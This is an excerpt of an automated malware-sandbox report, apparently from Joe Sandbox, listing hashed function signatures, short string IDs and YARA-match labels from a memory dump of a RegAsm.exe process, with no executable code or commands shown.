                                                      • Instruction ID: bb41e8b13f176b197a8e10d4dde50fa6e0ce8ca76c9034d38a3517968bb0ad29
                                                      • Opcode Fuzzy Hash: 869930153e3630061cfc2212e87621c06b0f7d623c5796ac555c0ebedb5d3c29
                                                      • Instruction Fuzzy Hash: F4C15A75A083116FD724DF21D881A2BB7E2ABDE704F16AA2EE5C553781D638DC04C78A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: m
                                                      • API String ID: 0-3775001192
                                                      • Opcode ID: 844987965f40079c61b601cedf19b759f80ba459d70370987815db4daec65b09
                                                      • Instruction ID: 244b2cefeb1f5bc2c232bbf8925c55c2a37160be3d0d910679bc8471d4ecd8fe
                                                      • Opcode Fuzzy Hash: 844987965f40079c61b601cedf19b759f80ba459d70370987815db4daec65b09
                                                      • Instruction Fuzzy Hash: C6D134B5A093109FC320DF24D89126FB7A2EF96304F49492EE9D587352EB38D905CB96
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .
                                                      • API String ID: 0-1505114982
                                                      • Opcode ID: 058d6976c154ba544523462971709c9beecc9be599d953173e0a21b130673455
                                                      • Instruction ID: 5388aebb9722ef47512ed6758712c035957564ba8f43e3dcaa493907b87915b9
                                                      • Opcode Fuzzy Hash: 058d6976c154ba544523462971709c9beecc9be599d953173e0a21b130673455
                                                      • Instruction Fuzzy Hash: 5FC12AB5D40212CBCB24CF69CC916BBB7B1FF95310F19825DD896AB390E738A841CB94
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: H
                                                      • API String ID: 0-2852464175
                                                      • Opcode ID: f90cc14d5b1d07471296a569d27c41b333f7458cf0fcf530a90d726fe5722012
                                                      • Instruction ID: 0c29c4f326a3360d4f83cd19facfb249d1e6e8dcfa8d7f8eb9091c930c4cf0c7
                                                      • Opcode Fuzzy Hash: f90cc14d5b1d07471296a569d27c41b333f7458cf0fcf530a90d726fe5722012
                                                      • Instruction Fuzzy Hash: 69D17634B05254CFDB14CF78E8D16AEBBB2AF1A310F6841BDE5519B392CB384906CB59
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: &#
                                                      • API String ID: 0-1789715784
                                                      • Opcode ID: 22a36dcdbd8bb691aabc79129864c8fc9f30262683b427dbcce92819f32defe7
                                                      • Instruction ID: c9f534a10d10fcbb0aeeb65dde57b2602cc7be5083ad25e1a4bd69b4b534b867
                                                      • Opcode Fuzzy Hash: 22a36dcdbd8bb691aabc79129864c8fc9f30262683b427dbcce92819f32defe7
                                                      • Instruction Fuzzy Hash: 6FA14B71B042205BD7249B289C5267BB3E1EFA1324F89852EF896973D1E77CED01C35A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .
                                                      • API String ID: 0-1505114982
                                                      • Opcode ID: 25aa824990e0b099dbedb7f342dca715901da659ff19adf71e826704a6bc8dca
                                                      • Instruction ID: df86e8cabfd52562b6ebe50b702b66c3677f2f48fb8aab21b174fbacb2a831e7
                                                      • Opcode Fuzzy Hash: 25aa824990e0b099dbedb7f342dca715901da659ff19adf71e826704a6bc8dca
                                                      • Instruction Fuzzy Hash: 8AB1F4B5E402128BCB248F68CC927A7B7B1FF55314F19915ED845AB790E738AC42C7D4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -
                                                      • API String ID: 0-2547889144
                                                      • Opcode ID: 27c89adea84a4971459812ff31a4728146f694fcb44008b8af47e8cd9ff8a59b
                                                      • Instruction ID: aabc77385ad2167f9f1bd1f95327a4f60466d98ac0e5edc62967ee21bdfad669
                                                      • Opcode Fuzzy Hash: 27c89adea84a4971459812ff31a4728146f694fcb44008b8af47e8cd9ff8a59b
                                                      • Instruction Fuzzy Hash: E5D12F31A087455BC718CE29C99016FBBD2AFD1320F188A3EE4E5573D5DB3C99068B86
                                                      Strings
                                                      • ABE4A45DB129FD4CDB71E32F12885CB3, xrefs: 004097D3
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ABE4A45DB129FD4CDB71E32F12885CB3
                                                      • API String ID: 0-3838766293
                                                      • Opcode ID: ff3731471c5a2191c5a05658faba6c42204445524e7f8331b46cc9c8e8b982bc
                                                      • Instruction ID: 2e87a28a76dba4f31cae47dba0fb7e22e1a8f98f0dc0d4366023ba0889080103
                                                      • Opcode Fuzzy Hash: ff3731471c5a2191c5a05658faba6c42204445524e7f8331b46cc9c8e8b982bc
                                                      • Instruction Fuzzy Hash: 35C105716083808BD318DF35C85066BBBE6EBD2314F14893DE4D697392DB39C90ACB56
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: h d"
                                                      • API String ID: 0-862628183
                                                      • Opcode ID: 907832ec394077f3cb61ce921fa134c81a3c0afbaec0ddbe82e25e94bded95fe
                                                      • Instruction ID: e7b26040d347b48bd15f509a2e92d141a5522c4f34e33ed28b849909e17f734e
                                                      • Opcode Fuzzy Hash: 907832ec394077f3cb61ce921fa134c81a3c0afbaec0ddbe82e25e94bded95fe
                                                      • Instruction Fuzzy Hash: 81B1CF79204700CFD3248F74EC91B67B7F6FB4A301F058A7DE99682AA0D774A859CB18
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ~
                                                      • API String ID: 0-1707062198
                                                      • Opcode ID: c6e5f3a96d2a0d2092885be3190280842d6212ff46f1b7e7ee293dffb0663f1e
                                                      • Instruction ID: fb8d2d24bbcf8da77d425a74861fbc6d37f4fcabb9a6f9815e5d7f96e75daac0
                                                      • Opcode Fuzzy Hash: c6e5f3a96d2a0d2092885be3190280842d6212ff46f1b7e7ee293dffb0663f1e
                                                      • Instruction Fuzzy Hash: E2A14772E042215FCB15CE2888806ABB7D1ABD5324F19823EECB99B3D2D634DD0697D1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RpB
                                                      • API String ID: 0-664042118
                                                      • Opcode ID: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
                                                      • Instruction ID: f37ba1eb55105a71e6c02689e7a75f224f26334d47d5f70d86fb510902375083
                                                      • Opcode Fuzzy Hash: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
                                                      • Instruction Fuzzy Hash: 09B12532A0C391CFD314CF28E89072AB7E2BF8A711F1A4A6DE59597391C7349D45CB4A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: d1
                                                      • API String ID: 0-4211392460
                                                      • Opcode ID: edb911d7aecce0065a01ffc3dd7ddc49175b84e24517e95a1a2a614b98ad95cb
                                                      • Instruction ID: 74c04020a71521c8b9984734295d0b81cdc6df3862d17ec890c7cf8b211da757
                                                      • Opcode Fuzzy Hash: edb911d7aecce0065a01ffc3dd7ddc49175b84e24517e95a1a2a614b98ad95cb
                                                      • Instruction Fuzzy Hash: 409112B5618200DFD714DF24E881A7BB7A0FB8A705F84593EF48693361DB38C9158B4A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Fg
                                                      • API String ID: 0-875302535
                                                      • Opcode ID: cec98c6035f8278796335b79b8fe425f66d685e3fc2c40d87c06063720ff0d23
                                                      • Instruction ID: 81bd39487229f81fa75b1a19b8121f8c05985a2d1a0f7b16a24bef680633e699
                                                      • Opcode Fuzzy Hash: cec98c6035f8278796335b79b8fe425f66d685e3fc2c40d87c06063720ff0d23
                                                      • Instruction Fuzzy Hash: 6F81E47121D3808BE768CF25C8657ABBBD2EBD2304F58896DC1C987392DB38440ACB56
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ,
                                                      • API String ID: 0-3772416878
                                                      • Opcode ID: 735cee050c0adee449850ba2ce1bb04225bd749ef176fa0d293106b9e62c3734
                                                      • Instruction ID: 6b9defcb35fa499ff27616791264c6e5e8496363bec20089c87d7e70d31ec12b
                                                      • Opcode Fuzzy Hash: 735cee050c0adee449850ba2ce1bb04225bd749ef176fa0d293106b9e62c3734
                                                      • Instruction Fuzzy Hash: 72B136701087819FC321CF18C88061BBBE0AFA9704F444E6EF5D997382D635E918CBA7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: js{g
                                                      • API String ID: 0-1014319796
                                                      • Opcode ID: 9c18fcfdf183d3e6e2325b026543344db9fcf0b9b7ccceb31fbfaeb5f3b5c64c
                                                      • Instruction ID: 14be18684298a51b6f1365b8eea6b5aba3066a4a8cfe6059be97ad669d3f7baa
                                                      • Opcode Fuzzy Hash: 9c18fcfdf183d3e6e2325b026543344db9fcf0b9b7ccceb31fbfaeb5f3b5c64c
                                                      • Instruction Fuzzy Hash: FF815671650B804BE7398F35C8517ABBBE2AB56718F08895DD4D39BB85C378E406CB44
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: gfff
                                                      • API String ID: 2994545307-1553575800
                                                      • Opcode ID: a0da0e1a58219443cd6ae0c7bfd152e4ce8a5e9250f758d58d558c5ed45439cf
                                                      • Instruction ID: c6a45f7a1688543314b9a3a30fef6f223fff4d1289bb41df6adbe344278a34bf
                                                      • Opcode Fuzzy Hash: a0da0e1a58219443cd6ae0c7bfd152e4ce8a5e9250f758d58d558c5ed45439cf
                                                      • Instruction Fuzzy Hash: 0F81D2717147418FD325CB39CC50BA6BBE2AB95308F18C57ED096CB7A6EA78A842C744
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: ihgf
                                                      • API String ID: 2994545307-2948842496
                                                      • Opcode ID: ab1477d1033f8dec076903ebca1be19e8e3099a8087cf93edb3e20610523f821
                                                      • Instruction ID: 39294a001ccb7b60b57bd072fead094b817a0247c43ae1e4845dbb8435dacfda
                                                      • Opcode Fuzzy Hash: ab1477d1033f8dec076903ebca1be19e8e3099a8087cf93edb3e20610523f821
                                                      • Instruction Fuzzy Hash: 5B81C274A04201AFD714CF28E881A6BB7F2FF99314F15A52DE5858B3A1DB35EC11CB46
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "
                                                      • API String ID: 0-123907689
                                                      • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                      • Instruction ID: 4b2f630bb6a68757ad0504ce5be77257e5761d12b45ca5ba0373d51c8e5240e3
                                                      • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                      • Instruction Fuzzy Hash: 22710532B083259BD714CE28E88431BB7E2ABC5710F99852EEC948B391D379DC55878B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: DB
                                                      • API String ID: 0-3908451873
                                                      • Opcode ID: d605064758935f16ad6935a6e04185f2643797c2b9515f21a60167d82474eb99
                                                      • Instruction ID: 63fe74dcdf674bdd3faef37b2e0283437cd793175f1af46cf0498e51130e9ee1
                                                      • Opcode Fuzzy Hash: d605064758935f16ad6935a6e04185f2643797c2b9515f21a60167d82474eb99
                                                      • Instruction Fuzzy Hash: A381B67AF04225CBCB18CF64D8905AEB7B2FFDA710F59806AC841AB355DB349D42CB54
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LB
                                                      • API String ID: 0-539997225
                                                      • Opcode ID: d02495da20a3f8a7219353459d550f72d20704d827e4251e17801bf690faaf74
                                                      • Instruction ID: 190c79d128488961cfb389f9b0ffad8fedd0031ada35975bf34f4c17adb32e46
                                                      • Opcode Fuzzy Hash: d02495da20a3f8a7219353459d550f72d20704d827e4251e17801bf690faaf74
                                                      • Instruction Fuzzy Hash: D1618E31B412228BDB18CF29E8A12FBFBE2EF91310B58466ED4574B3C1D7389941D799
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Y*>
                                                      • API String ID: 0-3862480330
                                                      • Opcode ID: 22b3804befe7f91e84aca949ffb80fce2ed22dd13d93b44656185de14de2ea60
                                                      • Instruction ID: 90e50e1672eaf7fe8d97f2f09bdb4033b3ef25f85dbdb073c688402916a0328e
                                                      • Opcode Fuzzy Hash: 22b3804befe7f91e84aca949ffb80fce2ed22dd13d93b44656185de14de2ea60
                                                      • Instruction Fuzzy Hash: 4C510573F499814BD72C893C5C223EAAA834BD6234B2DD77BE4B2CB3E4D5698C464345
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: w
                                                      • API String ID: 0-2991200456
                                                      • Opcode ID: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                      • Instruction ID: 72f7098589d43736da4273b9d7e3299e197f10f25cbeea51759b9c2434ba13e7
                                                      • Opcode Fuzzy Hash: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                      • Instruction Fuzzy Hash: 8E4119B6E116558FD704DFA4CC855ABBB72FB88315B1AC1A8C8847B319D77868078BD0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: ihgf
                                                      • API String ID: 2994545307-2948842496
                                                      • Opcode ID: 43b7dcd72b74260400957a7b37b74b5e300ce905b31fc695f742453478a8ea1b
                                                      • Instruction ID: 0aea9c019cfcbf9c29137c9c12aa4ed540cc4986b7a763f7409eb823f2adcf13
                                                      • Opcode Fuzzy Hash: 43b7dcd72b74260400957a7b37b74b5e300ce905b31fc695f742453478a8ea1b
                                                      • Instruction Fuzzy Hash: 9831D474308300AFE7109B249CC1B3BF7A6EB8A718F24692EE584A72D1D665EC10875A
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0ffcb586982cb18347a88d56587a7455aea838f8e5703d59131cd49a89af27b5
                                                      • Instruction ID: d6216dced0a3b9436857ee0068e0dff51503e5ecb223af83f8720e1cf69b390d
                                                      • Opcode Fuzzy Hash: 0ffcb586982cb18347a88d56587a7455aea838f8e5703d59131cd49a89af27b5
                                                      • Instruction Fuzzy Hash: F02242B56082009FE7149F24EC41B6B73A2FBDB300F55893EF6C487292DA799C41CB4A
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5a7678f017f308848797c1ab2fc33ccddf339249d7514e43f7e0819896a5eda0
                                                      • Instruction ID: 9c79f7e63c480dd40f7a7ccc60d41b21814d9940eb0dc65dd07d8a453e372cf2
                                                      • Opcode Fuzzy Hash: 5a7678f017f308848797c1ab2fc33ccddf339249d7514e43f7e0819896a5eda0
                                                      • Instruction Fuzzy Hash: 16120E35204B018FD325CF29C8907A3BBE2EF9A314F19866DD4DA8B795D738E846CB54
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2cf22539860d374f1b5b70c1f2b7734314ec6e2843ab381a6f5f63b3db803864
                                                      • Instruction ID: b7901f3288d9e4572b9bc57ce4c79cacd886df45a950704f10474c7163005246
                                                      • Opcode Fuzzy Hash: 2cf22539860d374f1b5b70c1f2b7734314ec6e2843ab381a6f5f63b3db803864
                                                      • Instruction Fuzzy Hash: CE52F4715083458FCB14CF18C0806AABFE1BF89315F18867EF8996B391D778EA49CB85
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f260d4ba8b532cff43b70e0305cc444787dac05339277c8b44483d328b2ca1f5
                                                      • Instruction ID: f9402e00db0146810cf529bce4eeb96ef771652ee20e7226bad8efb3fef3d353
                                                      • Opcode Fuzzy Hash: f260d4ba8b532cff43b70e0305cc444787dac05339277c8b44483d328b2ca1f5
                                                      • Instruction Fuzzy Hash: DA52C7B0A08B848FE735CB24C4843A7BBE1AB51314F15893FD5E716BC2C27DA995C71A
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 384453c34c44fa10a221719aff1fe9f2af50c5f2060accd689493d508a0f7137
                                                      • Instruction ID: d272bb6b5d6e2c7a5f0cafe8b1d1f27913d4ef5c9ad92f98558892845c7f91e7
                                                      • Opcode Fuzzy Hash: 384453c34c44fa10a221719aff1fe9f2af50c5f2060accd689493d508a0f7137
                                                      • Instruction Fuzzy Hash: B5625CB0608B818ED325CF3C8855797BFE5AB5A314F048A5DE0EE873D2C7B96405CB66
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 678ad88440436fc2347c77ec1617077ed1d00620730d0d2d7e6321ebe71b5d32
                                                      • Instruction ID: 3fdae14cd15e0c33f5e2b36ae0900265362ef596646a5ff17c50a816546e4c47
                                                      • Opcode Fuzzy Hash: 678ad88440436fc2347c77ec1617077ed1d00620730d0d2d7e6321ebe71b5d32
                                                      • Instruction Fuzzy Hash: ED323370914B118FC328CF29C68052ABBF5BF85711B604A2ED697A7F90D73AF945CB08
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d94ed56ffcdc38c94b90bd9783928bf4a55e001c4d3c4371622baab0c0238d3b
                                                      • Instruction ID: 1131e2afb1b9b7a06d06e0851762e967182e12a53f43e8bd2da4f6050e1e8ff1
                                                      • Opcode Fuzzy Hash: d94ed56ffcdc38c94b90bd9783928bf4a55e001c4d3c4371622baab0c0238d3b
                                                      • Instruction Fuzzy Hash: C802C732A0C7118BC724DE18D8816ABB3E2EBD4345F19893ED586A73C5D738B815CB4B
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: f294011623701e8b9ed5bfd878411dd116e2deaf0e85f456f0db657ca5256693
                                                      • Instruction ID: 6564eefc0a79269b3db00a3a3e2fdb8cf1d61b2510fe7412d98733e2447c0821
                                                      • Opcode Fuzzy Hash: f294011623701e8b9ed5bfd878411dd116e2deaf0e85f456f0db657ca5256693
                                                      • Instruction Fuzzy Hash: 6CC128342047418FD7258F28C890AA7BBE1FF9B310F58896ED4D6477A2CB75E846CB58
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7dd1dd3bcd13b84c911ff83a91c1cc82912ef431115ec00b7fd8cedab479074d
                                                      • Instruction ID: 2610ce8d2ada8b42ce1f8a49459609e4fff09a6b757421d9f45879ca41997f09
                                                      • Opcode Fuzzy Hash: 7dd1dd3bcd13b84c911ff83a91c1cc82912ef431115ec00b7fd8cedab479074d
                                                      • Instruction Fuzzy Hash: A8D10E36A187508FC704CF28D8D162AB7E2BBCE314F09897DE98687396D738D905CB46
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cfd12deba1f5b1e185dc8cea1c4f0dd34181c3b18da48610411f741cad837184
                                                      • Instruction ID: b593eabd3734573ca464a0f0c89662c3852b345cc910da406a972fedca83911a
                                                      • Opcode Fuzzy Hash: cfd12deba1f5b1e185dc8cea1c4f0dd34181c3b18da48610411f741cad837184
                                                      • Instruction Fuzzy Hash: CDC1ED3AA18611CFC704CF28D8D066AB7E2FB8E315F19887DE98687352D738D945CB46
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9f2680bab9b6854d00e0753734e73372bb980c2eb61b62fe20cb4c3e0bac24b1
                                                      • Instruction ID: 93b8c5387be001e94cab0129f885dbabef0bc68014b552001e05b684e15851e5
                                                      • Opcode Fuzzy Hash: 9f2680bab9b6854d00e0753734e73372bb980c2eb61b62fe20cb4c3e0bac24b1
                                                      • Instruction Fuzzy Hash: 48E19A712087418FD720DF29C880A6BBBE1EF99304F44882EE4D597792E379E944CB96
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f471f3d39aca677c1a2c39babe6ca4d167e6e7ed24f73cd0afd5c860e5d8b012
                                                      • Instruction ID: 32691a19542b475e5b32abf01bf61a59727b98503660fe5e1cf9ea7214f750c2
